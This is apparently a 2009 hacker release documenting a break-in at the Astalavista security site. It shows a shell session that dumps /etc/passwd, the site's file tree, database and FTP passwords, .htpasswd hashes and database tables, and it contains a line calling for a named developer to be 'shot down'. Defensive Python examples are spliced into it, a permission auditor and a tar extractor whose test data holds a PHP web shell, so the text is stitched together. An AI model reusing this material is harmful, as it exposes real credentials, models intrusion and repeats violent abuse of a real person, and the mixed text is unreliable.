- [ASCII-art banner: ASTALAVISTA]
- The Hacking & Security Community
- [+] Founded in 1997 by a hacker computer enthusiast
- [-] Exposed in 2009 by anti-sec group
- From <http://astalavista.com/faq>:
- >> 03. Who's behind the site?
- >>
- >> A team of security and IT professionals, and a countless number of contributors from all over the world.
- >> 05. Is it true that the site is visited by script-kiddies and warez fans only?
- >>
- >> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and military institutions.
- >> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
- Why has Astalavista been targeted?
- Other than the fact that they are not doing any of this for the "community" but
- for the money, they spread exploits for kids, claim to be a security community
- (with no real sense of security on their own servers), and they charge you $6.66
- per month to access a dead forum with a directory filled with public releases
- and outdated / broken services.
- We wanted to see how good that "team of security and IT professionals" really is.
- Let's begin.
- anti-sec:~# ./g0tshell astalavista.com -p 80
- [+] Connecting to astalavista.com:80
- [+] Grabbing banner...
- LiteSpeed
- [+] Injecting shellcode...
- [-] Wait for it
- [~] We g0tshell
- uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
- ID: uid=100(apache) gid=500(apache) groups=500(apache)
- sh-3.2$ cat /etc/passwd
- root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- news:x:9:13:news:/etc/news:
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- rpm:x:37:37::/var/lib/rpm:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- pcap:x:77:77::/var/arpwatch:/sbin/nologin
- named:x:25:25:Named:/var/named:/sbin/nologin
- apache:x:100:500::/var/www:/bin/false
- diradmin:x:101:101::/usr/local/directadmin:/bin/bash
- mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
- webapps:x:500:501::/var/www/html:/bin/bash
- majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
- admin:x:501:502::/home/admin:/bin/bash
- jon:x:502:503::/home/jon:/bin/bash
- com:x:503:504::/home/com:/bin/bash
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin
- astanet:x:504:505::/home/astanet:/bin/bash
- avahi:x:70:70:Avahi daemon:/:/sbin/nologin
- avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
- sh-3.2$ cat /etc/hosts
- # Do not remove the following line, or various programs
- # that require network functionality will fail.
- 127.0.0.1 localhost.localdomain localhost
- ::1 localhost6.localdomain6 localhost6
- 80.74.154.172 asta1.astalavistaserver.com
- sh-3.2$ pwd
- /home/com/public_html
- sh-3.2$ ls -la
- total 18460
- drwxr-xr-x 30 com apache 4096 May 28 17:06 .
- drwx--x--x 11 com com 4096 Jun 25 2008 ..
- drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
- drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
- drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
- drwxrwxrwx 2 com com 4096 May 19 00:50 config
- drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
- drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
- drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
- drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
- drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
- -rw-r--r-- 1 com com 8035 May 19 14:26 directory_to_mediadir.php
- drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
- drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
- -rw-r--r-- 1 com com 3750 Feb 27 16:12 favicon.ico
- drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
- -rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
- -rw-r--r-- 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
- -rw-r--r-- 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
- drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
- drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
- -rw-r--r-- 1 com com 97496 Jun 2 13:01 index.php
- drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
- drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
- drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
- drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
- drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
- drwxr-xr-x 34 com com 4096 May 28 16:30 modules
- drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
- drwxrwxr-x 22 com com 4096 May 28 17:06 _new
- drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
- drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
- drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
- -rw-r--r-- 1 com com 26 Feb 2 19:33 robots.txt
- -rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
- -rw-r--r-- 1 com com 223 Mar 30 15:32 test.php
- drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
- drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
- drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
- sh-3.2$ head -20 index.php
- <?php
- /**
- * The main page for the CMS
- * @copyright CONTREXX CMS - COMVATION AG
- * @author Comvation Development Team
- * @version v1.0.9.10.1 stable
- * @package contrexx
- * @subpackage core
- * @link http://www.contrexx.com/ contrexx homepage
- * @since v0.0.0.0
- * @todo Capitalize all class names in project
- * @uses /config/configuration.php
- * @uses /config/settings.php
- * @uses /config/version.php
- * @uses /core/API.php
- * @uses /core_modules/cache/index.class.php
- * @uses /core/error.class.php
- * @uses /core_modules/banner/index.class.php
- * @uses /core_modules/contact/index.class.php
- sh-3.2$ cd config/
- sh-3.2$ ls -la
- total 32
- drwxrwxrwx 2 com com 4096 May 19 00:50 .
- drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
- -rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
- -rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
- -rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
- -rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
- sh-3.2$ cat configuration.php
- [snip]
- $_DBCONFIG['host'] = 'localhost'; // This is normally set to localhost
- $_DBCONFIG['database'] = 'com_contrexx2_live'; // Database name
- $_DBCONFIG['tablePrefix'] = 'contrexx_'; // Database table prefix
- $_DBCONFIG['user'] = 'contrexxuser2'; // Database username
- $_DBCONFIG['password'] = '0fEYNZgXz1pKe'; // Database password
- $_DBCONFIG['dbType'] = 'mysql'; // Database type (e.g. mysql,postgres ..)
- $_DBCONFIG['charset'] = 'utf8'; // Charset (default, latin1, utf8, ..)
- [snip]
- $_FTPCONFIG['is_activated'] = true; // Ftp support true or false
- $_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
- $_FTPCONFIG['host'] = 'localhost';// This is normally set to localhost
- $_FTPCONFIG['port'] = 21; // Ftp remote port
- $_FTPCONFIG['username'] = 'dev@astalavista.com'; // Ftp login username
- $_FTPCONFIG['password'] = 'jajklop0Iuj'; // Ftp login password
- $_FTPCONFIG['path'] = '/'; // Ftp path to cms
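The listing above shows the whole config/ directory, including configuration.php with the database and FTP credentials in it, at mode 777, and the public_html tree has several more 777 directories (cache, config, feed, images, media, themes, tmp). Below is an added example, not part of the original release, of the check a reviewer would run over such output: a parser for `ls -la` rows that flags world-writable entries and world-readable backup copies. The sample listing is built from rows shown on this page; which filename patterns count as "sensitive" is this example's own assumption.

```python
"""Added example: audit an `ls -la` listing for world-writable entries.

Not part of the original release. SAMPLE_LISTING is built from rows shown
on the page; the SENSITIVE patterns and severity labels are assumptions.
"""
import re
from typing import Dict, List, Tuple

# One `ls -la` row: type, 9 permission chars, link count, owner, group,
# size, date ("Mon DD HH:MM" or "Mon DD YYYY"), name.
LS_ROW = re.compile(
    r"^([-dl])([rwxsStT-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+"
    r"\S+\s+\d+\s+[\d:]+\s+(.+)$"
)

# Names whose contents are secrets or control code execution (assumption).
SENSITIVE = (".php", ".htaccess", ".htpasswd")

# Constructed from rows on this page: the config/ directory plus one of the
# .htaccess backups from public_html.
SAMPLE_LISTING = """\
total 32
drwxrwxrwx 2 com com 4096 May 19 00:50 .
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
-rw-r--r-- 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
"""


def parse_listing(text: str) -> List[Dict[str, str]]:
    """Parse `ls -la` rows into dicts; the `total` line and junk are skipped."""
    rows = []
    for line in text.splitlines():
        m = LS_ROW.match(line.strip())
        if not m:
            continue
        kind, perms, owner, group, name = m.groups()
        rows.append({"kind": kind, "perms": perms, "owner": owner,
                     "group": group, "name": name})
    return rows


def is_world_writable(perms: str) -> bool:
    return perms[7] == "w"          # 'other' write bit


def is_world_readable(perms: str) -> bool:
    return perms[6] == "r"          # 'other' read bit


def audit(rows: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (name, severity, reason) for every questionable row."""
    findings = []
    for r in rows:
        name, perms = r["name"], r["perms"]
        if name == "..":
            continue
        if name == ".":
            if is_world_writable(perms):
                findings.append((name, "high",
                                 "directory is world-writable: any local user can add or replace files"))
            continue
        sensitive = name.endswith(SENSITIVE) or ".htaccess" in name
        if is_world_writable(perms):
            sev = "critical" if sensitive else "high"
            findings.append((name, sev, "world-writable"))
        elif name.endswith(".bak") and is_world_readable(perms):
            findings.append((name, "medium", "backup copy readable by every local user"))
    return findings


if __name__ == "__main__":
    for name, sev, why in audit(parse_listing(SAMPLE_LISTING)):
        print(f"{sev:8} {name}: {why}")
```

On a live box the equivalent one-liner is `find /home/com/public_html -perm -o+w`; the parser is for reviewing captured listings like the ones in this paste. A world-writable configuration.php means any local account, including every other customer on a shared DirectAdmin host, can rewrite the credentials or inject PHP that the web server will execute.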
- sh-3.2$ cd ..
- sh-3.2$ cd dvd/
- sh-3.2$ ls -la
- total 2913780
- drwxr-xr-x 2 com com 4096 Sep 9 2008 .
- drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
- -rw-r--r-- 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
- -rw-r--r-- 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
- -rw-r--r-- 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
- -rw-r--r-- 1 com com 115 Jan 29 2008 .htaccess
- sh-3.2$ cat .htaccess
- authType Basic
- authName DVD
- authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
- require valid-user
- sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
- DVDdownload:CRD8cuY6.MPT6
- DVDdownload2:CR8a36.wluFMg
- sh-3.2$ cat test.php
- <?php
- $url = 'aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D';
- $url = str_replace(array('&amp;', '&'), '&', base64_decode(rawurldecode($url)));
- echo $url;
- ?>
- sh-3.2$ cd modifications/
- sh-3.2$ ls -la
- total 32
- drwxr-xr-x 8 com com 4096 May 11 12:48 .
- drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
- drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
- drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
- drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
- drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
- drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
- drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
- sh-3.2$ ls -R
- .:
- com_avtng cronjobs onlinetools pjirc search _tmp
- ./com_avtng:
- avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
- ./com_avtng/scripts:
- popunder.js
- ./cronjobs:
- exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
- ./cronjobs/tmp:
- contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
- ./onlinetools:
- index.php
- ./pjirc:
- a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
- AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
- background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
- ./pjirc/img:
- ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
- arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
- verre-eau.gif
- argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
- verre-vin.gif
- ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
- biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
- ./pjirc/snd:
- bell2.au ding.au
- ./search:
- searchEngines.php search.php
- ./_tmp:
- defaultPorts.php defaultPorts.txt
- sh-3.2$ cd cronjobs/
- sh-3.2$ cat exploits.php
- [snip]
- $categories = array();
- $milw0rmFile = FULLPATH . '/modifications/cronjobs/tmp/milw0rm/sploitlist.txt';
- $expolits = file($milw0rmFile);
- $comExploits = array();
- [snip]
- // manage data
- for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
- // get path and title
- $expolits[$x] = trim($expolits[$x]);
- $path = str_replace('./', FULLPATH . '/modifications/cronjobs/tmp/milw0rm/', substr($expolits[$x], 0, strpos($expolits[$x], ' ')));
- $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ' ') + 1, strlen($expolits[$x])), ENT_QUOTES);
- // check if file exists
- if (file_exists($path)) {
- $text = file_get_contents($path);
- // get content and date
- //$text = htmlspecialchars($text, ENT_QUOTES);
- $tmptext = addslashes(htmlentities($text, ENT_QUOTES, "UTF-8"));
- if ($tmptext != '') {
- $text = $tmptext;
- } else {
- $text = addslashes(htmlentities($text, ENT_QUOTES));
- }
- $date = str_replace('milw0rm.com [', '', str_replace(']', '', strstr($text, 'milw0rm.com [')));
- $tmp = explode('-', $date);
- $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
- $cat = getCategory ($path);
- $ext = pathinfo(basename($path));
- $ext = $ext['extension'];
- $qStr = "
- SELECT `id`
- FROM `contrexx_module_exploits`
- WHERE `title` = '" . $title . "'
- AND `date` = '" . $date . "'
- ";
- echo $x + 1 . ' von ' . count($expolits) . ' -> ' . $qStr . "\n";
- $q = $_objDB->query($qStr);
- if ($q->numRows() == 0) {
- // prepare array
- $comExploits[$x]['date'] = $date;
- $comExploits[$x]['title'] = $title;
- $comExploits[$x]['author'] = 'milw0rm';
- $comExploits[$x]['text'] = $text;
- $comExploits[$x]['source'] = $ext;
- $comExploits[$x]['url1'] = '';
- $comExploits[$x]['url2'] = '';
- $comExploits[$x]['catid'] = $cat;
- $comExploits[$x]['lang'] = '2';
- $comExploits[$x]['userid'] = '12';
- $comExploits[$x]['startdate'] = '0000-00-00';
- $comExploits[$x]['enddate'] = '0000-00-00';
- $comExploits[$x]['status'] = '1';
- $comExploits[$x]['changelog'] = $date;
- }
- [snip]
- $xml = '<?xml version="1.0" encoding="UTF-8"?>
- <rss version="2.0">
- <channel>
- <title>ASTALAVISTA.com - Exploits</title>
- <link>http://www.astalavista.com/exploits</link>
- <description>All availably Exploits.</description>
- <language>en-us</language>
- <lastBuildDate>' . date('F, j M Y H:i:s O') . '</lastBuildDate>
- <docs>http://blogs.law.harvard.edu/tech/rss</docs>
- <generator>Astalavista.com</generator>
- <webMaster>info@astalavista.com</webMaster>' . $items . '
- </channel>
- </rss>';
- if (file_exists(FULLPATH . '/feed/exploits.xml')) {
- unlink (FULLPATH . '/feed/exploits.xml');
- }
- file_put_contents(FULLPATH . '/feed/exploits.xml', $xml);
- [snip]
- sh-3.2$ cat exploits.sh
- #!/bin/sh
- ###########################################################
- # #
- # Title: milw0rm exploits adder #
- # Description: Add all milw0rm exploits to the #
- # Astalavista.com database #
- # #
- # Company: Astalavista Group #
- # Author: Paulo M. Santos #
- # E-Mail: paulo.santos@astalavista.ch #
- # #
- ###########################################################
- # path
- this_path=/home/com/public_html/modifications/cronjobs
- # change directory
- cd $this_path
- cd tmp/
- # delete files
- rm -rf milw0rm.tar.* &
- rm -rf milw0rm/ &
- # wget milw0rm paket
- wget http://www.milw0rm.com/sploits/milw0rm.tar.bz2
- # extract milw0rm paket
- tar -xvf milw0rm.tar.bz2
- # change owner
- chown -R com .
- chgrp -R com .
- # execute php script
- cd $this_path
- php -q exploits.php
- # delete files
- rm -rf tmp/milw0rm.tar.*
- rm -rf tmp/milw0rm/
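The cron job above pulls milw0rm.tar.bz2 over plain HTTP with no integrity check, runs `tar -xvf` on whatever arrives, and starts both `rm -rf` cleanups in the background with `&`, so they can still be running when wget and tar begin. Anyone able to tamper with that download (or with milw0rm.com itself) gets to choose what lands in the web tree. The block below is an added example, not the site's code, of the same fetch-and-unpack step done defensively in Python: the download is compared against a pinned SHA-256 (assumed to be known from a trusted channel), every archive member is checked for absolute paths, `..` components and link or device entries before anything is written, and only then is it extracted. The three sample archives are constructed in memory so the example runs offline.

```python
"""Added example: verify and safely unpack an untrusted tarball.

Not part of the original release. The expected digest is assumed to be
known out of band; the sample archives below are constructed in memory.
"""
import hashlib
import hmac
import io
import os
import tarfile
import tempfile
from typing import List, Optional, Tuple


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def digest_matches(data: bytes, expected_hex: str) -> bool:
    """Constant-time comparison of the download against the pinned digest."""
    return hmac.compare_digest(sha256_hex(data), expected_hex.lower())


def unsafe_reason(member: tarfile.TarInfo) -> Optional[str]:
    """Why this member must not be extracted, or None if it is a plain in-tree entry."""
    name = member.name.replace("\\", "/")
    if name.startswith("/") or os.path.isabs(name):
        return "absolute path"
    if ".." in name.split("/"):
        return "path traversal"
    if member.issym() or member.islnk():
        return "link member (can point outside the tree)"
    if member.isdev() or member.isfifo():
        return "device or fifo member"
    return None


def check_archive(data: bytes) -> List[str]:
    """'name: reason' for every unsafe member; an empty list means clean."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
        found = [(m.name, unsafe_reason(m)) for m in tf.getmembers()]
    return [f"{name}: {why}" for name, why in found if why]


def safe_extract(data: bytes, expected_sha256: str, dest: str) -> List[str]:
    """Pin the digest, refuse unsafe members, then extract. Returns member names."""
    if not digest_matches(data, expected_sha256):
        raise ValueError("sha256 mismatch: download is not the expected archive")
    problems = check_archive(data)
    if problems:
        raise ValueError("unsafe archive: " + "; ".join(problems))
    os.makedirs(dest, exist_ok=True)
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
        if hasattr(tarfile, "data_filter"):      # Python 3.12+ and backports
            tf.extractall(dest, filter="data")
        else:
            tf.extractall(dest)                  # members were vetted above
        return [m.name for m in tf.getmembers()]


def build_tar(entries: List[Tuple[str, Optional[bytes]]]) -> bytes:
    """Constructed test data: (name, payload); payload None = symlink to /etc/passwd."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, payload in entries:
            info = tarfile.TarInfo(name)
            if payload is None:
                info.type = tarfile.SYMTYPE
                info.linkname = "/etc/passwd"
                tf.addfile(info)
            else:
                info.size = len(payload)
                tf.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


GOOD_TAR = build_tar([("milw0rm/sploitlist.txt", b"./exploits/1.c Example\n")])
TRAVERSAL_TAR = build_tar([("../../public_html/shell.php", b"<?php system($_GET['c']); ?>")])
SYMLINK_TAR = build_tar([("milw0rm/passwd", None)])


def run_demo() -> dict:
    """Push the three archives (and one bad digest) through the pipeline."""
    dest = tempfile.mkdtemp(prefix="sploits-")
    results = {"good": safe_extract(GOOD_TAR, sha256_hex(GOOD_TAR), dest)}
    cases = [("traversal", TRAVERSAL_TAR, sha256_hex(TRAVERSAL_TAR)),
             ("symlink", SYMLINK_TAR, sha256_hex(SYMLINK_TAR)),
             ("wrong_digest", GOOD_TAR, "00" * 32)]
    for label, blob, digest in cases:
        try:
            safe_extract(blob, digest, dest)
            results[label] = "extracted (BUG)"
        except ValueError as exc:
            results[label] = str(exc)
    return results


if __name__ == "__main__":
    for label, outcome in run_demo().items():
        print(f"{label}: {outcome}")
```

The member check runs before extraction rather than relying on the tar implementation to refuse bad paths, because GNU tar of that era would happily honour `../` entries unless told otherwise; the pinned digest closes the plain-HTTP substitution problem, and doing the cleanup synchronously (not with `&`) removes the race between delete and download.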
- sh-3.2$ echo "Paulo M. Santos needs to be shot down."
- Paulo M. Santos needs to be shot down.
- sh-3.2$ mysql -u contrexxuser2 -p
- Enter password:
- Welcome to the MySQL monitor. Commands end with ; or \g.
- Your MySQL connection id is 261694
- Server version: 5.0.45-community-log MySQL Community Edition (GPL)
- Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
- mysql> show databases;
- +--------------------+
- | Database |
- +--------------------+
- | information_schema |
- | com_contrexx2 |
- | com_contrexx2_live |
- | test |
- +--------------------+
- 4 rows in set (0.00 sec)
- mysql> use com_contrexx2_live
- Database changed
- mysql> show tables;
- +--------------------------------------------------+
- | Tables_in_com_contrexx2_live |
- +--------------------------------------------------+
- | cc_banner_counter |
- | cc_search_counter |
- | contrexx_access_group_dynamic_ids |
- | contrexx_access_group_static_ids |
- | contrexx_access_rel_user_group |
- | contrexx_access_settings |
- | contrexx_access_user_attribute |
- | contrexx_access_user_attribute_name |
- | contrexx_access_user_attribute_value |
- | contrexx_access_user_core_attribute |
- | contrexx_access_user_groups |
- | contrexx_access_user_mail |
- | contrexx_access_user_profile |
- | contrexx_access_user_title |
- | contrexx_access_user_validity |
- | contrexx_access_users |
- | contrexx_backend_areas |
- | contrexx_backups |
- | contrexx_content |
- | contrexx_content_history |
- | contrexx_content_logfile |
- | contrexx_content_navigation |
- | contrexx_content_navigation_history |
- | contrexx_ids |
- | contrexx_languages |
- | contrexx_lib_country |
- | contrexx_log |
- | contrexx_module_alias_source |
- | contrexx_module_alias_target |
- | contrexx_module_block_blocks |
- | contrexx_module_block_rel_lang |
- | contrexx_module_block_rel_pages |
- | contrexx_module_block_settings |
- | contrexx_module_blog_categories |
- | contrexx_module_blog_comments |
- | contrexx_module_blog_message_to_category |
- | contrexx_module_blog_messages |
- | contrexx_module_blog_messages_lang |
- | contrexx_module_blog_networks |
- | contrexx_module_blog_networks_lang |
- | contrexx_module_blog_settings |
- | contrexx_module_blog_votes |
- | contrexx_module_calendar |
- | contrexx_module_calendar_access |
- | contrexx_module_calendar_categories |
- | contrexx_module_calendar_form_data |
- | contrexx_module_calendar_form_fields |
- | contrexx_module_calendar_registrations |
- | contrexx_module_calendar_settings |
- | contrexx_module_calendar_style |
- | contrexx_module_contact_form |
- | contrexx_module_contact_form_data |
- | contrexx_module_contact_form_field |
- | contrexx_module_contact_settings |
- | contrexx_module_data_categories |
- | contrexx_module_data_message_to_category |
- | contrexx_module_data_messages |
- | contrexx_module_data_messages_lang |
- | contrexx_module_data_placeholders |
- | contrexx_module_data_settings |
- | contrexx_module_directory_access |
- | contrexx_module_directory_categories |
- | contrexx_module_directory_dir |
- | contrexx_module_directory_inputfields |
- | contrexx_module_directory_levels |
- | contrexx_module_directory_mail |
- | contrexx_module_directory_rel_dir_cat |
- | contrexx_module_directory_rel_dir_level |
- | contrexx_module_directory_settings |
- | contrexx_module_directory_settings_google |
- | contrexx_module_directory_vote |
- | contrexx_module_docsys |
- | contrexx_module_docsys_categories |
- | contrexx_module_egov_configuration |
- | contrexx_module_egov_orders |
- | contrexx_module_egov_product_calendar |
- | contrexx_module_egov_product_fields |
- | contrexx_module_egov_products |
- | contrexx_module_egov_settings |
- | contrexx_module_exploits |
- | contrexx_module_exploits_categories |
- | contrexx_module_feed_category |
- | contrexx_module_feed_news |
- | contrexx_module_feed_newsml_association |
- | contrexx_module_feed_newsml_categories |
- | contrexx_module_feed_newsml_documents |
- | contrexx_module_feed_newsml_providers |
- | contrexx_module_forum_access |
- | contrexx_module_forum_categories |
- | contrexx_module_forum_categories_lang |
- | contrexx_module_forum_notification |
- | contrexx_module_forum_postings |
- | contrexx_module_forum_rating |
- | contrexx_module_forum_settings |
- | contrexx_module_forum_statistics |
- | contrexx_module_gallery_categories |
- | contrexx_module_gallery_comments |
- | contrexx_module_gallery_language |
- | contrexx_module_gallery_language_pics |
- | contrexx_module_gallery_pictures |
- | contrexx_module_gallery_settings |
- | contrexx_module_gallery_votes |
- | contrexx_module_guestbook |
- | contrexx_module_guestbook_settings |
- | contrexx_module_livecam |
- | contrexx_module_livecam_settings |
- | contrexx_module_market |
- | contrexx_module_market_access |
- | contrexx_module_market_categories |
- | contrexx_module_market_mail |
- | contrexx_module_market_paypal |
- | contrexx_module_market_settings |
- | contrexx_module_market_spez_fields |
- | contrexx_module_mediadir_access |
- | contrexx_module_mediadir_categories |
- | contrexx_module_mediadir_comments |
- | contrexx_module_mediadir_dir |
- | contrexx_module_mediadir_inputfields |
- | contrexx_module_mediadir_levels |
- | contrexx_module_mediadir_mail |
- | contrexx_module_mediadir_rel_dir_cat |
- | contrexx_module_mediadir_rel_dir_level |
- | contrexx_module_mediadir_reports |
- | contrexx_module_mediadir_settings |
- | contrexx_module_mediadir_settings_google |
- | contrexx_module_mediadir_vote |
- | contrexx_module_memberdir_directories |
- | contrexx_module_memberdir_name |
- | contrexx_module_memberdir_settings |
- | contrexx_module_memberdir_values |
- | contrexx_module_nettools_allowed_groups |
- | contrexx_module_nettools_settings |
- | contrexx_module_news |
- | contrexx_module_news_access |
- | contrexx_module_news_categories |
- | contrexx_module_news_settings |
- | contrexx_module_news_teaser_frame |
- | contrexx_module_news_teaser_frame_templates |
- | contrexx_module_news_ticker |
- | contrexx_module_newsletter |
- | contrexx_module_newsletter_attachment |
- | contrexx_module_newsletter_category |
- | contrexx_module_newsletter_confirm_mail |
- | contrexx_module_newsletter_rel_cat_news |
- | contrexx_module_newsletter_rel_user_cat |
- | contrexx_module_newsletter_settings |
- | contrexx_module_newsletter_template |
- | contrexx_module_newsletter_tmp_sending |
- | contrexx_module_newsletter_user |
- | contrexx_module_newsletter_user_title |
- | contrexx_module_onlinetools_defaultports |
- | contrexx_module_onlinetools_defaultports_back |
- | contrexx_module_onlinetools_geolitecity_blocks |
- | contrexx_module_onlinetools_geolitecity_country |
- | contrexx_module_onlinetools_geolitecity_location |
- | contrexx_module_podcast_category |
- | contrexx_module_podcast_medium |
- | contrexx_module_podcast_rel_category_lang |
- | contrexx_module_podcast_rel_medium_category |
- | contrexx_module_podcast_settings |
- | contrexx_module_podcast_template |
- | contrexx_module_proxydb |
- | contrexx_module_recommend |
- | contrexx_module_repository |
- | contrexx_module_securitynews_cats |
- | contrexx_module_securitynews_feeds |
- | contrexx_module_securitynews_news |
- | contrexx_module_shop_categories |
- | contrexx_module_shop_config |
- | contrexx_module_shop_countries |
- | contrexx_module_shop_currencies |
- | contrexx_module_shop_customers |
- | contrexx_module_shop_importimg |
- | contrexx_module_shop_lsv |
- | contrexx_module_shop_mail |
- | contrexx_module_shop_mail_content |
- | contrexx_module_shop_manufacturer |
- | contrexx_module_shop_order_items |
- | contrexx_module_shop_order_items_attributes |
